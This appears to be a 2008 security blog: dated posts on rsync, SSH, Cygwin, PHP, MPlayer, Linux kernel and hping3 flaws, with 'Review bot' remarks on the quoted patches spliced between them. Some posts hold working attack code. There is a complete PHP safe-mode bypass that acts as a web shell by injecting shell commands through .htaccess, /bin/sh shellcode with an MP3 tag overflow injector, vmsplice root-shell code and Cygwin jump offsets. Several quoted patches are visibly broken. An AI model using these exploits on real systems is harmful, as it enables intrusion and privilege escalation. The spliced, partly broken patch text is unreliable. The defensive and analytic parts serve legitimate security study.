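Review bot: `if (num >= MALLOC_MAX/size)` divides by `size` with no guard against `size == 0`, and changing `num` from `unsigned long` to `size_t` leaves that check's arithmetic as it was (the post notes that rsync.h defines size_t as unsigned int, so on that build the parameter even gets narrower); the commit should say what the type change fixes, or add `if (size == 0) return NULL;` ahead of the division. The parameter order `(ptr, size, num)` also differs from `_new_array(num, size, ...)` shown in the hunk header, which makes swapped arguments at call sites easy to miss.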
@@ -1550,7 +1550,10 @@ void *expand_item_list(item_list *lp, size_t item_size,
    new_size += incr;
   else
    new_size *= 2;
-  new_ptr = realloc_array(lp->items, char, new_size * item_size);
+  if (new_size < lp->malloced)
+   overflow_exit("expand_item_list");
+  /* Using _realloc_array() lets us pass the size, not a type. */
+  new_ptr = _realloc_array(lp->items, item_size, new_size);
   if (verbose >= 4) {
    rprintf(FINFO, "[%s] expand %s to %.0f bytes, did%s move\n",
     who_am_i(), desc, (double)new_size * item_size,
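
Review bot: the new `if (new_size < lp->malloced) overflow_exit(...)` only detects `new_size` itself wrapping after `new_size += incr` or `new_size *= 2`; since the byte count `new_size * item_size` is no longer formed here, overflow of that product now rests entirely on `_realloc_array()`'s `num >= MALLOC_MAX/size` check, and the comment `/* Using _realloc_array() lets us pass the size, not a type. */` should state that this is where the multiplication is bounded so a later refactor does not drop it.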


1. size_t


First there is the check if (num >= MALLOC_MAX/size)
num*size has to be less than MALLOC_MAX

Does this check have a sign problem?

rsync.h redefines size_t as unsigned int, so there is no problem, and the xattr patch doesn't change it to a signed type.

There is no sign problem here.

2. new_size < malloced


+ if (new_size < lp->malloced)
Now it is not possible to use this realloc to shrink the heap variable lp->items!!!

3. supply the fixed size instead of the type char


char should be *1; I don't think this was a problem.

- new_ptr = realloc_array(lp->items, char, new_size * item_size);
+ new_ptr = _realloc_array(lp->items, item_size, new_size);

The first will use a macro to do:
_realloc_array (ptr, sizeof(char), new_size*item_size)

rsync.h:#define realloc_array(ptr, type, num) ((type*)_realloc_array((ptr), sizeof(type), (num)))

The second will realloc item_size*new_size

The Problem


So the problem seems to be the reduction in size, which was not controlled and allows overflowing the lp->items array.

The Exploitation


More details about exploitation, soon.

Thursday, April 10, 2008

PokerStars Security

In this video we can see that the code is making a TCP connection to 77.87.178.66. The SSL-encrypted connection to port 445 can be redirected to my sha0proxy.pl.

PokerStars communication is secure because they check the certificates.






If we patch the call dword ptr DS:[7145C] (connect) to make our fake connection to the evil server, it will not work because of the certificate validation. But the cards can be sent to the evil host, and the trojanized client can be distributed to users.

Conclusion: software must always be downloaded from an official source via a clear URL.

Wednesday, April 09, 2008

Plan9 Security

Plan 9 is a new concept of operating system; I like it, but I am not confident about its security.

- It saves all the passwords used to connect to remote services in the cache

- There are open grids; maybe they are vulnerable to some kind of worm, or can be used as DDoS platforms.

- When you enter the password to log in to a remote file server, it is shown in plain text on the screen.

- Plan 9 services are vulnerable to stack attacks.

plan9 Security
plan9 Shellcode
plan9 scheduler
pegasus, plan9 webserver
acid, plan9 debugger

I have recorded a video introducing the acid debugger usage.



Monday, April 07, 2008

SSH ForceCommand security flaw

ForceCommand is an sshd_config option that lets a remote SSH user execute only a restricted command, for example vi somefile.

When an SSH session is started, the ~/.ssh/rc shell script is executed, and the user logged in by SSH has permission to write his own rc.

So if we are allowed to run vi somefile, we can write into ~/.ssh/rc a /bin/bash line that will be spawned the next time we enter the system.

The patch only allows rc execution when ForceCommand is not enabled (options.adm_forced_command == NULL):


+++ usr.bin/ssh/session.c 27 Mar 2008 10:54:55 -0000
@@ -878,8 +878,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;

- /* ignore _PATH_SSH_USER_RC for subsystems */
- if (!s->is_subsystem && (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
+ /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
+ if (!s->is_subsystem && options.adm_forced_command == NULL &&
+ (stat(_PATH_SSH_USER_RC, &st) >= 0)) {
snprintf(cmd, sizeof cmd, "%s -c '%s %s'",
shell, _PATH_BSHELL, _PATH_SSH_USER_RC);
if (debug_flag)
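
Review bot: the new test `options.adm_forced_command == NULL` covers only the sshd_config ForceCommand, so a session restricted by a key's `command=` option in authorized_keys is not excluded by this condition as written and would still run `_PATH_SSH_USER_RC`; either extend the condition to that case or make the comment `/* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */` explicit that key-level forced commands are handled elsewhere.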

Wednesday, March 19, 2008

cygwin security

In November 2007 I reported to the Cygwin developers a very important security flaw in the Cygwin subsystem, which can be exploited remotely via SSH, HTTP, or almost any kind of daemon running under Cygwin.

jolmos cygwin Advisory

vade79/v9 has released a nice exploit for the webdespoxy software; with Cygwin the exploitation is more effective because all Cygwin processes link the cygwin1.dll kernel, so we have some universal offsets like:

0x61048690 push esp - ret
0x6104936D jmp esp
0x6112C494 push esp - ret

I don't recommend using Cygwin to expose services to the net.

Thursday, February 28, 2008

Opera Blogs anti-automation system

Today I reported to opera.com that they are using a weak/useless anti-automation system; well, we can make a simple bot that creates hundreds of blogs :)

Look at their anti-automation "captcha":

http://my.opera.com/community/signup/


well, a text security code is so easy to collect.
More info at:
http://www.captcha.net/

cya.

Wednesday, February 27, 2008

How to make a sandbox

A real sandbox should be a loadable kernel module, but we can easily make one in user space by coding a library that gets preloaded on every execution.

gcc -fPIC sandwich.c -o sandwich.so -shared -ldl
export LD_PRELOAD=`pwd`/sandwich.so

Now connect() and sendto() are hooked, so we can run our "unsaf" programs;
if they try to connect, the call is intercepted.

Well, this can be bypassed by calling the syscall directly or by using functions that are not hooked.

// $ gcc -fPIC sandwich.c -o sandwich.so -shared -ldl
// $ LD_PRELOAD=`pwd`/sandwich.so ./unsafe_program
#define _GNU_SOURCE            /* exposes RTLD_NEXT in <dlfcn.h> */
#include <stdio.h>
#include <dlfcn.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

//Real calls, resolved lazily from the next object in the lookup chain (libc)
static int (*realConnect)(int sockfd,
                          const struct sockaddr *serv_addr,
                          socklen_t addrlen);
static ssize_t (*realSendto)(int s,
                             const void *msg,
                             size_t len,
                             int flags,
                             const struct sockaddr *to,
                             socklen_t tolen);

//Ask on the terminal; returns 1 to allow the call, 0 to deny it
static int ask(const char *what, const struct sockaddr *sa)
{
    char host[INET_ADDRSTRLEN] = "?";
    int port = -1, c, opt;

    //Only decode IPv4; sendto() on a connected socket may pass to == NULL
    if (sa != NULL && sa->sa_family == AF_INET) {
        const struct sockaddr_in *in = (const struct sockaddr_in *)sa;
        inet_ntop(AF_INET, &in->sin_addr, host, sizeof host);
        port = ntohs(in->sin_port);   /* sin_port is in network byte order */
    }
    printf("Can I %s to %s:%d (Y/N)?", what, host, port);
    fflush(stdout);

    opt = c = getchar();
    while (c != '\n' && c != EOF)     /* discard the rest of the input line */
        c = getchar();
    return opt == 'S' || opt == 's' || opt == 'y' || opt == 'Y';
}

//Hooked calls
int connect(int sockfd, const struct sockaddr *serv_addr, socklen_t addrlen)
{
    if (!ask("connect", serv_addr)) {
        printf("Cancelled ;)\n");
        errno = ECONNREFUSED;         /* callers expect errno to be set on -1 */
        return -1;
    }
    if (realConnect == NULL)
        realConnect = dlsym(RTLD_NEXT, "connect");
    return realConnect(sockfd, serv_addr, addrlen);
}

ssize_t sendto(int s, const void *msg, size_t len, int flags,
               const struct sockaddr *to, socklen_t tolen)
{
    if (!ask("send", to)) {
        printf("Cancelled ;)\n");
        errno = EACCES;
        return -1;
    }
    if (realSendto == NULL)
        realSendto = dlsym(RTLD_NEXT, "sendto");
    return realSendto(s, msg, len, flags, to, tolen);
}

Tuesday, February 26, 2008

PHP SafeMode bypass (CVE-2007-3378)

Every week a new way to bypass PHP safe mode is released; it seemed funny, but this open_basedir bypass is scandalous.

If you try to execute some restricted call, safe mode will stop it.
Another way is to use the php_value directive of .htaccess files (if httpd.conf is configured to allow .htaccess).

So you can break the safe-mode restrictions by adding php_value directives like these:

php_value include_path "some"
php_flag display_errors On
php_value upload_max_filesize 200M

for example:

echo php_value session.save_path /inne > .htaccess
session_start();

Exploit code:

<?php
# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
# Affected Software : PHP 5.2.3 and prior
# Usage :
# ?cxib=dhr - Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#
#variables
$htaccess="./.htaccess";
#variables
if(@mail("", "", "")==FALSE){
    die("mail() function isn't active.");
}
if(!is_writable("./")){
    die("This directory isn't writable.");
}
if($_GET['cxib']=="dhr"){
    @unlink("./.htaccess");
    @unlink("./result.txt");
}
$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
    $usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}
$htmlstart="<HTML>
<HEAD>
<TITLE>SecurityReason Exploit - PHP 5.2.3 and prior</TITLE>
</HEAD>
<BODY>";
$formtxt="<center><h1>Security<b><font color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and prior</p><B><CENTER><FONT COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>
".$usun."
<p>Form:<br>
<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\" name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\" value=\"Exec\">
</form>
</CENTER></B>";
$htmlend="</BODY>
</HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);
if(empty($sh)){
    if(empty($_GET['sh'])){
        if(empty($_POST['sh'])){
            echo $htmlstart.$formtxt;
            if(file_exists("./result.txt")){
                echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].$path."/result.txt\" height=300 width=1000></center>";
            }
            echo $htmlend;
            exit();
        } else {
            $sh=$_POST['sh'];
        }
    } else {
        $sh=$_GET['sh'];
    }
}
if (!$handle = @fopen($htaccess, 'w')) {
    echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>. exit();";
    exit;
}
# the value is appended to the sendmail command line; '&& <cmd>' makes it a shell command
$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) {
    echo "Cannot write to file (".$htaccess.")";
    exit;
}
if(!empty($_POST['sent'])){
    @mail("", "", "Yeah");
    sleep(2);
    header("Location: http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
    exit();
}
?>

have fun.
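
A defender-side complement, added here and not part of the exploit or the post: a Python scanner that reads .htaccess content for php_value/php_flag directives which change security-sensitive settings or carry shell syntax, such as the mail.force_extra_parameters line the exploit writes. The key list and the sample .htaccess are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# PHP settings a per-directory .htaccess should never be allowed to change on a
# shared host. The set is an assumption for this example, seeded with the keys
# the post uses (include_path, session.save_path, mail.force_extra_parameters).
SENSITIVE_KEYS = {
    "mail.force_extra_parameters",   # appended to the sendmail command line
    "session.save_path", "include_path", "open_basedir", "safe_mode",
    "safe_mode_exec_dir", "disable_functions", "auto_prepend_file",
    "auto_append_file", "upload_tmp_dir",
}
DIRECTIVE_RE = re.compile(
    r"^\s*(php_value|php_flag|php_admin_value|php_admin_flag)\s+(\S+)\s+(.*?)\s*$",
    re.IGNORECASE)
SHELL_META_RE = re.compile(r"[;&|`>]|\$\(")   # shell separators / redirections

# Constructed .htaccess mixing the post's harmless directives with the one the
# exploit writes.
SAMPLE_HTACCESS = """\
# constructed sample
php_value include_path "some"
php_flag display_errors On
php_value upload_max_filesize 200M
php_value mail.force_extra_parameters '-t && id > /var/www/result.txt'
"""

def parse_htaccess(text: str) -> List[Dict[str, object]]:
    """Return every php_value/php_flag style directive as
    {'line': n, 'directive': ..., 'key': ..., 'value': ...}; other lines are ignored."""
    found = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE_RE.match(line)
        if m:
            found.append({"line": lineno, "directive": m.group(1).lower(),
                          "key": m.group(2).lower(), "value": m.group(3)})
    return found

def find_overrides(text: str) -> List[Dict[str, object]]:
    """Flag directives that change a sensitive setting or smuggle shell syntax
    into a value; each finding carries the reasons it was flagged."""
    findings = []
    for d in parse_htaccess(text):
        reasons = []
        if d["key"] in SENSITIVE_KEYS:
            reasons.append("security-sensitive setting")
        if SHELL_META_RE.search(str(d["value"])):
            reasons.append("shell metacharacters in value")
        if reasons:
            findings.append({**d, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_overrides(SAMPLE_HTACCESS):
        print(f"line {f['line']}: {f['directive']} {f['key']} -> {', '.join(f['reasons'])}")
```

Setting the same keys with php_admin_value in httpd.conf, or AllowOverride None for the directory, stops .htaccess from overriding them at all.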

Friday, February 22, 2008

Google AdSense is not a serious option

If you are thinking of putting up Google AdSense, you must know some things about them:

If somebody attacks your AdSense ads:
1. Google will close your account
2. Google will take money from your bank account!! They say "We will get the money you have earned"

Well, I suggest avoiding Google AdSense.

Wednesday, February 13, 2008

MPlayer Security

MPlayer started 2008 the wrong way: 3 dangerous security flaws have been reported.

* CVE-2008-0486 Stack overflow line 229 demux_audio.c
Attack Vector: .mov file header

ptr += 4;
comment = ptr;
+ if (&comment[length] < comments ||
&comment[length] >= &comments[blk_len])
+ return;
c = comment[length];
comment[length] = 0;
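
Review bot: the added bounds check `&comment[length] < comments || &comment[length] >= &comments[blk_len]` is written on pointers, and forming `&comment[length]` for an attacker-controlled `length` that already lies outside the block is pointer arithmetic past the object, which compilers may treat as undefined; the guard is more robust on offsets, e.g. `if (length >= blk_len - (comment - comments)) return;` once `comment` is known to lie inside `comments`. As pasted, the continuation line `&comment[length] >= &comments[blk_len])` also lacks its leading `+`, so the second half of the condition would not be part of the patch.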


* CVE-2008-0629 Overflow stream/g
Attack Vector: Album title

strncpy(album_title, ptr, len);
album_title[len-2]='\0';


The -2 is wrong.


* CVE-2008-0630 Overflow url.c
Attack Vector: a long URL will miss the final \0

The most dangerous scenario is to publish an mp3 with a crafted album name; whoever listens to this mp3 via cddp:// will be infected or reverse-shelled, and then with the vmsplice exploit remote root will be

Recommendation: always the same, keep your software updated and audited!

I'm doing the POC:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

//not used by this POC, which only overwrites the album field with 'A's
char sha0code[] =
"\xeb\x16\x5b\x31\xc0"
"\x50\x53\xb0\x0b\x89"
"\xdb\x89\xe1\x31\xd2"
"\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80\xe8"
"\xe5\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";

//returns non-zero when ptr points at the ID3v1 "TAG" marker
int checkIdent(char *ptr) {
    if (ptr[0] == 'T' &&
        ptr[1] == 'A' &&
        ptr[2] == 'G')
        return -1;
    else
        return 0;
}

int main (int argc, char **argv) {
    char *mp3file;
    int fd;
    int bytes;
    int i;
    int n;
    char *album = NULL;

    if (argc != 2) {
        printf("USAGE: %s FileToInjectTheExploit.mp3\n",argv[0]);
        return 0;
    }

    //map mp3 to memory
    fd = open(argv[1],O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    bytes = lseek(fd,0,SEEK_END);
    if (bytes < 128) {   //an ID3v1 tag is the last 128 bytes of the file
        fprintf(stderr,"file too small to hold an ID3v1 tag\n");
        close(fd);
        return 1;
    }
    mp3file = (char *)malloc(bytes);
    if (mp3file == NULL) {
        perror("malloc");
        close(fd);
        return 1;
    }
    lseek(fd,0,SEEK_SET);
    bytes = read(fd,mp3file,bytes);

    //look for the mp3 tag structure, scanning backwards from the end
    //(start 3 bytes before the end so "TAG" is always read inside the buffer)
    for (i=bytes-3; i>100; i--) {
        if (checkIdent(i+mp3file)) {
            album = mp3file+i+3+30+30;   //"TAG" + title(30) + artist(30)
            break;
        }
    }
    if (album == NULL) {
        fprintf(stderr,"no ID3v1 TAG found\n");
        free(mp3file);
        close(fd);
        return 1;
    }

    //inject the evil string: 90 bytes of 'A', clipped to the end of the buffer
    //(bytes past the end of the file would never be written back anyway)
    printf("Album:%.30s\n",album);
    n = 90;
    if (album + n > mp3file + bytes)
        n = (mp3file + bytes) - album;
    memset(album,0x41,n);

    //write changes
    lseek(fd,0,SEEK_SET);
    write(fd,mp3file,bytes);
    close(fd);
    free(mp3file);
    return 0;
}

MS08-004 CVE-2008-0084 Windows Vista remote reboot

If the attacker assigns the broadcast address to multiple hosts with DHCP requests, Windows Vista's duplicate IP detection algorithm will try to remove this broadcast address from the routing table, and then the system reboots.

Security Fix

Sunday, February 10, 2008

Linux vmsplice Local Root Exploit

The Linux vmsplice syscall lets a non-root user inject code into the kernel and execute it.

Vulnerable kernels: Linux 2.6.17 - 2.6.24.1

It works fine on my Debian 2.6.18-4-486

The goal is to inject this code into the kernel.
This loop checks the task_struct: if the current uid and gid are found, they are set to zero.
/* runs in ring 0; uid, gid, uint, get_current() and exit_kernel() are defined elsewhere in the exploit */
void kernel_code()
{
    int i;
    uint *p = get_current();

    /* walk the current task_struct looking for the credential block
       (uid, euid, suid, fsuid, gid, egid, sgid, fsgid) */
    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;   /* all uids become 0 */
            p[4] = p[5] = p[6] = p[7] = 0;   /* all gids become 0 */
            /* skip the group_info pointer to reach the capability sets */
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }
    exit_kernel();
}
Then a root shell can be spawned:
/* SIGPIPE handler; die() is defined elsewhere in the exploit */
void exit_code()
{
    if (getuid() != 0)
        die("wtf", 0);

    printf("[+] root\n");
    putenv("HISTFILE=/dev/null");
    execl("/bin/bash", "bash", "-i", NULL);
    die("/bin/bash", errno);
}
kernel_code() is mapped and spliced into a pipe with _vmsplice(pi[1], &iov, 1, 0);
exit_code() is installed as the handler for the SIGPIPE signal.

The Exploit Code.

The problem is in fs/splice.c, copy_from_user_mmap_sem().

They solved the problem by adding two access_ok() calls that check the permissions of the page(s) to be copied.

The get_iovec_page_array() function also needs this access_ok() check; that patch was committed this Monday.

Friday, February 08, 2008

Multi Protocol Proxy

I have improved the visibility of my multi-protocol proxy.

This tool is useful when you want to analyze a protocol or a daemon: plug it in the middle, point it at the daemon and point the client at the proxy.



~ > sha0proxy.pl
/bin/sha0proxy.pl
modes: view trap

In view mode you can watch the communication.
In trap mode you can interact with the communication.

download sha0proxy

-------- sha0proxy.pl ----------

#Multi-protocol proxy
#sha0proxy.pl v0.5 coded by sha0[@]badchecksum[.]net
#Private, do not distribute!!
#TODO: catch SIGINT
# ncurses to edit the bytes directly
# udp
# shellcode format
# logging



#You have to install vncviewer, and the following perl modules:
#perl -MCPAN -e shell
#cpan>install threads
#...
#cpan>install IO::Socket
#...
#cpan>install IO::Select
#...

use IO::Socket;
use IO::Select;
#use Net::UDP;
my %color=(
red=>"\x1b[31;01m",
green=>"\x1b[32;02m",
yellow=>"\x1b[33;01m",
blue=>"\x1b[34;01m",
magenta=>"\x1b[35;01m",
cyan=>"\x1b[36;01m",
white=>"\x1b[37;00m"
);

die "$0 \nmodes: view trap\n" if (@ARGV!=4);
die "Valid modes are: view & trap\n" if ($ARGV[3] ne 'view' && $ARGV[3] ne 'trap');

#my $lport=(int(rand(500))+10000);
my $lport=$ARGV[0];
my $rport=$ARGV[2];
my $rhost=$ARGV[1];
my $buff;
my $vulnerable=0;
my $mode=$ARGV[3];

my $out;
my $in=IO::Socket::INET->new (
LocalAddr=>'0.0.0.0',
LocalPort=>$lport,
Proto=>'tcp',
Listen=>1,
Reuse=>100
) or die "cannot open port $!\n";

print "listening $lport port\n";


#print "\x1b[?25l"; #no cursor

while (my $welcome=$in->accept()) {
$out=IO::Socket::INET->new (
PeerAddr=>$rhost,
PeerPort=>$rport,
Timeout=>20
) or die "cannot connect $!\n";

print "connected to $rhost:$rport\n";
if (!fork()) {
$out->blocking(1);
$welcome->blocking(1);
$out->autoflush(1);
$welcome->autoflush(1);

$s=IO::Select->new($out, $welcome);
proxy:
while(1) {
my @ready = $s->can_read;
foreach my $ready (@ready) {
if($ready == $welcome) {
my $data;
$welcome->recv($data, 8192);
last proxy if (! length($data));
last proxy if(!$out || !$out->connected);
&muestra($data,1);
if ($mode ne 'view') {
print "=>>";
$cmd=<STDIN>;
chomp($cmd);
$data=sprintf(eval("\"$cmd\"")) if (length($cmd));
}
eval { $out->send($data); };
last proxy if $@;
} elsif ($ready == $out) {
my $data;
$out->recv($data, 8192);
last proxy if(!length($data));
last proxy if(!$welcome || !$welcome->connected);
&muestra($data,0);
if ($mode ne 'view') {
print "=<<";
$cmd=<STDIN>;
chomp($cmd);
$data=sprintf(eval("\"$cmd\"")) if (length($cmd));
}
eval { $welcome->send($data); };
last proxy if $@;
}
}#foreach

if (!$welcome || !$out) {
close $out;
close $welcome;
exit 0; #child: connection gone
}
}#while 1
close $out;
close $welcome;
exit 0; #the child must not go back to accept()
} #fork

}
sub muestra {
my $data = $_[0];
my @bytes = split(//,$data);
my $b;
my $alserver = $_[1];
my $count=0;
my $str="";
my $lin=1;
print $color{white};
print ">"x33 if ($alserver);
print "<"x33 if (!$alserver);
print "\n |00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20|";
print "\n---+--------------------------------------------------------------+---\n";

print "000|";
foreach $b (@bytes) {
print $color{green} if (($b ge 'a' && $b le 'z') ||($b ge 'A' && $b le 'Z') || $b eq "\x20");
print $color{blue} if ($b ge '0' && $b le '9');
print $color{red} if ($b eq "\x00");
print $color{cyan} if ($b eq "\x0a" || $b eq "\x0d");
printf "%.2x ",ord($b);
print $color{white};
$b = "." if ($b lt "\x20" || $b gt "\x7e");

$count++;
$str.=$b;
if ($count==21) {

#$str=~s/[^a-z^A-Z^0-9^#^@^:^]/\./ig;

$count = 0;
printf "%s\n%.3d|",$str,$lin;
$lin++;
$str="";
}
}
$str=~s/[^a-z^A-Z^0-9^#^@]/\./ig;
for ($b=$count;$b<21;$b++){
print " ";
}
print $str."\n";
}

Friday, February 01, 2008

Xorg stack overflow privilege escalation

If the user requests more visuals than the total number of visuals of all screens, the swap loop can be abused.

Xext/EVI.c
ProcEVIGetVisualInfo(ClientPtr client)

+ for (i = 0; i < screenInfo.numScreens; i++)
+ total_visuals += screenInfo.screens[i]->numVisuals;
+ if (stuff->n_visual > total_visuals)
+ return BadValue;
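Review bot: `total_visuals` is not initialised in the lines shown; it must start at 0 before the `for` loop or the `stuff->n_visual > total_visuals` test compares against whatever was on the stack. The check also accepts `n_visual == total_visuals`, so the loop that fills the per-visual data must still be bounded by the sizes of the arrays it writes, not only by this count.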



more info soon.

Thursday, January 24, 2008

CVE-2008-0001 privilege escalation exploit.

CVE-2008-0001 Linux Kernel VFS Unauthorized File Access Vulnerability.

Trond changed the namei.c code and introduced a vulnerability on 18 Oct 2005.
Bill Roman detected it and solved the problem with the following patch:

--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1576,7 +1576,7 @@ int may_open(struct nameidata *nd, int acc_mode, int flag)
if (S_ISLNK(inode->i_mode))
return -ELOOP;

- if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
+ if (S_ISDIR(inode->i_mode) && (acc_mode & MAY_WRITE))
return -EISDIR;

error = vfs_permission(nd, acc_mode);
return -EACCES;

flag &= ~O_TRUNC;
- } else if (IS_RDONLY(inode) && (flag & FMODE_WRITE))
+ } else if (IS_RDONLY(inode) && (acc_mode & MAY_WRITE))
return -EROFS;
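Review bot: the quoted patch is missing lines: there is no second `@@` header before `flag &= ~O_TRUNC;`, and `error = vfs_permission(nd, acc_mode);` is followed directly by `return -EACCES;` with no condition between them, so this excerpt will not apply as-is; quote both hunks complete. On the change itself, switching both tests from `flag & FMODE_WRITE` to `acc_mode & MAY_WRITE` is the right fix, since `acc_mode` is what `vfs_permission()` is asked about; any other `FMODE_WRITE` test left in may_open() should be converted the same way so the two views cannot disagree.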


Well, FMODE_WRITE=2: if we open a non-writable file with O_RDWR (=2) we get -EROFS,
but we can use O_WRONLY (=1), which is != FMODE_WRITE (=2), and then map the descriptor into memory and write ;)


#drwxr-xr-x 2 root root 4096 2008-01-28 15:46 test
#su - shao

Without write permissions, shao has opened it for append:

open("/test", O_WRONLY) = -1 EISDIR (Is a directory)
open("/test", O_RDWR) = -1 EISDIR (Is a directory)
open("/test", O_RDONLY|O_APPEND) = 3

O_APPEND succeeds and the kernel gives us descriptor 3.

If we write with the write() syscall:

open("/tmp/test", O_RDONLY|O_APPEND) = 3
lseek(3, 0, SEEK_END) = 5
write(3, ptrace: umoven: Input/output error
0x41, 1) = -1 EBADF (Bad file descriptor)
close(3) = 0

The write() syscall returns EBADF: the kernel doesn't let us modify this kind of descriptor, there is a check for it.
The mmap() syscall returns -1.

Well, from user space we can't exploit this.

Tuesday, January 15, 2008

hping3 double free security flaw.

Today my friend Mario Diaz discovered an interesting flaw in hping3: a race condition plus a heap overflow that is tricky to reproduce.

I love this kind of flaw; let's analyse the problem in order to make the exploit:

pcap_close sometimes causes a double free corruption:

pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "", 66) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 66, 0, 0) = 0x807a12a
memcpy(0xb33e7970, "\252", 130) = 0xb33e7970
pcap_next(0x8079f20, 0x8069c70, 130, 0, 0) = 0x807a12a
--- SIGALRM (Alarm clock) ---
pcap_close(0x8079f20, 0, 0, 0x804eb0d, 0) = 505


When hping sends a packet, if you have specified the -c flag (number of packets) and all packets have been sent, a SIGALRM is scheduled:


send.c:void send_packet (int signal_id) {
...
sent_pkt++;
Signal(SIGALRM, send_packet);

if (count != -1 && count == sent_pkt) { /* count reached? */
Signal(SIGALRM, print_statistics);
alarm(COUNTREACHED_TIMEOUT);


hping2.h:#define COUNTREACHED_TIMEOUT 1

One second later the SIGALRM is triggered and print_statistics is called.

statistics.c:print_statistics(int signal_id) {

close_pcap();

I have reproduced the problem:



#include <pcap.h>
#include <stdio.h>

int main (void) {
    pcap_t *p;
    char errbuf[PCAP_ERRBUF_SIZE];

    /* NULL device lets libpcap pick one; closing the same handle twice
       reproduces the double free hping3 hits */
    p = pcap_open_live(NULL, 65535, 1, 3000, errbuf);
    if (p != NULL) {
        pcap_close(p);
        pcap_close(p);
    } else {
        printf("open failed: %s\n", errbuf);
    }
    return 0;
}


# ./pcap
*** glibc detected *** double free or corruption (out): 0x0804adc0 ***
Abortado

# ldd -d pcap
linux-gate.so.1 => (0xffffe000)
libpcap.so.0.8 => /usr/lib/libpcap.so.0.8 (0xb7f94000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e63000)
/lib/ld-linux.so.2 (0xb7fd5000)


When the race condition succeeds, pcap_close() is called twice, and then the double free happens.
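The defensive pattern for this bug, as an added example that is neither hping3's nor libpcap's code: the handle is closed through a helper that frees once and nulls the pointer, and the alarm handler only sets a flag that the main loop acts on; the `struct capture` stand-in and all function names are assumptions made so it runs without libpcap.

```c
#include <signal.h>
#include <stdlib.h>

/* Added example, not hping3's or libpcap's code: a stand-in handle so
 * the pattern runs without libpcap installed. */
struct capture { char *buf; };

static volatile sig_atomic_t count_reached = 0;
static int real_closes = 0;   /* times memory was really freed */

struct capture *capture_open(void)
{
    struct capture *c = malloc(sizeof *c);
    if (c) c->buf = malloc(128);
    return c;
}

/* Idempotent close: free once and leave NULL behind, so a second call
 * from whichever path comes later is a no-op instead of a double free. */
void capture_close(struct capture **cp)
{
    if (cp == NULL || *cp == NULL)
        return;
    free((*cp)->buf);
    free(*cp);
    *cp = NULL;
    real_closes++;
}

/* The handler only records the event; freeing inside a handler that can
 * interrupt the loop mid-pcap_next is what makes the race possible. */
static void on_alarm(int sig)
{
    (void)sig;
    count_reached = 1;
}

/* Count-reached path: raise() stands in for alarm(COUNTREACHED_TIMEOUT);
 * the loop notices the flag and closes once, and the end-of-program
 * cleanup close is then harmless. Returns the number of real closes. */
int run_count_reached_demo(void)
{
    struct capture *p = capture_open();
    real_closes = 0;
    signal(SIGALRM, on_alarm);
    raise(SIGALRM);
    if (count_reached)
        capture_close(&p);   /* what print_statistics would do */
    capture_close(&p);       /* cleanup */
    return real_closes;
}
```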

Wednesday, January 09, 2008

prctl problems have been solved

In 2.6.22.* and earlier we can call prctl(PR_SET_DUMPABLE, 2), and then the current->mm->dumpable value will be 2.

Let's see the bad check:


--- a/kernel/sys.c
+++ b/kernel/sys.c
@@ -1983,7 +1983,7 @@ asmlinkage long sys_prctl(int option, unsigned long arg2, unsigned long arg3,
error = current->mm->dumpable;
break;
case PR_SET_DUMPABLE:
- if (arg2 < 0 || arg2 > 2) {
+ if (arg2 < 0 || arg2 > 1) {
error = -EINVAL;
break;
}
current->mm->dumpable = arg2;
break;
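Review bot: `arg2 < 0` is dead code, because the `@@` line shows `arg2` is `unsigned long`, so only `arg2 > 1` ever rejects anything; drop the first comparison (compilers warn about it) and keep `if (arg2 > 1)`. The effective fix is lowering the upper bound from 2 to 1, and the prose above explains why a user-requested value of 2 must not be reachable.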

A non-root user can write an exploit like this and set PR_SET_DUMPABLE to two:

.text
.global main
main:
    mov $172, %eax   # __NR_prctl on i386
